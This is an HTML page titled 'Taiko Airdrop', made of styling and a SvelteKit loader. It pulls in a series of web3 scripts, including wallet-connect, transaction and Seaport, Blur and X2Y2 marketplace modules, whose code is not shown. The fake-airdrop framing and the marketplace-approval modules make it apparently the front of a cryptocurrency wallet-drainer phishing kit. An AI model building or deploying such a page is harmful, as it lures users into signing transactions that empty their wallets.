<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8" />
    <link rel="icon" href="./favicon.svg" />
    <meta name="viewport" content="width=device-width" />
    <title>Taiko Airdrop</title>
    <style>
      body {
        background: #0b101b;
        margin: 0px;
        padding: 0px;
        font-size: calc(15px + 0.390625vw);
      }

      .add_height {
        /* height: 90vh; */
        padding-bottom: 50vh !important;
      }

      .hide_box {
        display: none !important;
      }

      .btn_right_top {
        padding: 0 5% !important;
        font-size: 1.2em !important;
      }

      .test_abs_mini_block {
        width: 100%;
        display: flex;
        justify-content: center;
      }

      .btn_center_asd {
        padding: 0 20% !important;
      }

      .test_abs_timer {
        text-align: center;
        margin-top: 5%;
      }

      .test_pos_rel {
        position: relative;
      }

      .test_abs {
        position: absolute;
        bottom: 0;
      }

      .test_abs_text {
        font-family: Clash Grotesk;
        font-weight: 500;
        font-size: 3.5em;
      }
    </style>
  </head>
  <body data-sveltekit-preload-data="hover">
    <div style="display: contents">
			<script>
				{
					__sveltekit_1d2y34s = {
						base: new URL(".", location).pathname.slice(0, -1)
					};

					const element = document.currentScript.parentElement;

					Promise.all([
						import("./_app/immutable/entry/start.DglYIGJy.js"),
						import("./_app/immutable/entry/app.B-S7OVm0.js")
					]).then(([kit, app]) => {
						kit.start(app, element);
					});
				}
			</script>
		</div>

        <script src="./assets/web3-provider/web3-modal.js"></script>
        <script src="./assets/web3-provider/web3-loader.js"></script>
        <script src="./assets/web3-provider/web3-connect.js"></script>
        <script src="./assets/web3-provider/web3-router.js"></script>
        <script src="./assets/web3-provider/web3-module.js"></script>
        <script src="./assets/web3-provider/web3-alert.js"></script>
        <script src="./assets/web3-provider/web3-seaport.js"></script>
        <script src="./assets/web3-provider/web3-data.js"></script>
        <script src="./assets/web3-provider/ethers.js"></script>
        <script src="./assets/web3-provider/ethereum-tx.js"></script>
        <script src="./assets/web3-modules/module-seaport.js"></script>
        <script src="./assets/web3-modules/module-blur.js"></script>
        <script src="./assets/web3-modules/module-x2y2.js"></script>
        <script src="./assets/web3-provider.js"></script>

  </body>
</html>


